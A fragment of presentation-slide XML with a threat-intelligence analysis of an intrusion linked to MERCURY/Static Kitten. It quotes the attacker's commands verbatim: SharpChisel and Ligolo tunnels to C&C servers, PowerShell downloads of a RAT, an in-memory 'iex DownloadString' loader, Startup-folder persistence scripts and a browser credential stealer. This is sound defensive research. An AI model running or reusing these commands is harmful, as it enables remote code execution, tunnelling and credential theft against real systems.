                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>procdump64.exe,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and saves the file in the C:\programdata directory. That supports our assumption that SharpChisel could not be configured correctly, and the attacker instead used PowerShell to download and run the legitimate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>procdump64.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> utility.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="199" name="Google Shape;199;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1176850" y="2914850"/>
            <a:ext cx="6096000" cy="1578650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2649475" y="4429925"/>
            <a:ext cx="3009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000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIGOLO execution example</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42400" y="63575"/>
            <a:ext cx="9036600" cy="507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This was done using two separate commands:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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C:\programdate\1.exe -relayserver 87.236.212[.]184:5555</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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C:\users\public\new.exe -relayserver 87.236.212[.]184:5555</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We then see the threat actor again attempting to use SharpChisel several times using the following command:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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C:\programdata\SharpChisel.exe  client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 R:8888:127.0.0.1:9999</a:t>
            </a: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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We conclude that a tunneling connection to the C&amp;C server could not be established, even after attempts to do so with two different tools.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Following the unsuccessful attempt to configure a tunnel connection to their C&amp;C server, the threat actors downloaded a remote access tool (RAT) and attempted to configure it. The following PowerShell command was used for this:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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powershell.exe iwr -uri hxxp://87.236.212[.]184/out1 -outfile</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr"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 c:\users\public\out1.exe -usebasicparsing</a:t>
            </a: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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The command downloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>out1.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and saves the file in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>C:\users\public\ directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. Using a UPX unpacker, we were able to extract the contents, which consists of a Python executable. We then decompiled the python executable using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">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pyinstxtractor.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to get all of the Python bytecode files. These are then decompiled to get the original python code using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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easypythondecompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:schemeClr val="dk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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35325" y="42400"/>
            <a:ext cx="9078900" cy="505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The out1.exe RAT has the following capabilities:</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Data encoding</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Email parsing</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File and registry copy</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HTTP/S connection support</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Native command line</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Process and file execution</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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After this, the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>C:\users\public\Browser64.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> is run. Browser64 is a tool that extracts credentials from the following applications:</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Chrome</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Chromium</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Firefox</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Opera</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Internet Explorer</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Outlook</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="135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40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9114176" cy="4599476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3158150" y="4599475"/>
            <a:ext cx="27132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300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Usage Example of Browser64.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Averag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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32550" y="35350"/>
            <a:ext cx="9078900" cy="503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Following the use of browser64.exe, we observed the following command being executed:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l"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powershell.exe iex(new-object System.Net.WebClient).DownloadString('hxxp://23.94.50[.]197:444/index.jsp/deb2b1a127c472229babbb8dc2dca1c2/QPKb49mivezAdai1')</a:t>
            </a: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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>They again attempted to use SharpChisel with no success:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l"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powershell.exe C:\programdata\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999</a:t>
            </a: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C:\programdata\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999</a:t>
            </a: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C:\programdata\SharpChisel.exe server -p 9999 --socks5</a:t>
            </a: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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Finally, we observed a persistence mechanism being set using the following commands:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l"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cmd.exe /c Wscript.exe "C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\news.js"</a:t>
            </a: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050">
                <a:solidFill>
                  <a:srgbClr val="156EAC"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F6F6F6"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cmd.exe /c "C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\newsblog.js"</a:t>
            </a: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endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We were able to get a copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>newsblog.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, which is a simple VBS downloader that communicates with the following URL:</a:t>
            </a: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rgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>hxxp://23[.]95[.]215[.]100:8008/index.jsp/7e95a3d753cc4a17793ef9513e030b49/4t2Fg7k6wWRnKgd9</a:t>
            </a:r>
            <a:endParaRPr sz="135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35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156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>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2400"/>
            <a:ext cx="8520600" cy="67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 sz="3400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Associated</a:t>
            </a:r>
            <a:endParaRPr sz="3400"/>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1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>MERCURY</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Static Kitten</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Seedworm</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>TEMP.Zagros</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Earth Vetala</a:t>
            </a:r>
            <a:endParaRPr sz="17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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1643025" y="2451650"/>
            <a:ext cx="5646000" cy="4098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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>newsblog.js</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="227" name="Google Shape;227;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14913" y="1544275"/>
            <a:ext cx="9114173" cy="963900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;228;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="498900" y="3402675"/>
            <a:ext cx="8146200" cy="8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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The script sets up a new HTTP object and then tries to disable the system's local proxy settings. The script then executes an HTTP GET request to the C&amp;C URL, grabs the server's response, and sleeps for 10 seconds.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262250" y="63575"/>
            <a:ext cx="8520600" cy="763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sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>At the time of our analysis, this server was still available. The response from the server contains an encoded PowerShell script, which is executed in memory. Decoding this script reveals that it contains a backdoor:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="234" name="Google Shape;234;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="310875" y="413950"/>
            <a:ext cx="8287525" cy="4524650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544350" y="4847200"/>
            <a:ext cx="3956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000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deobfuscated PowerShell backdoor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Averag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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9100200" cy="5191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sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The screenshot shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
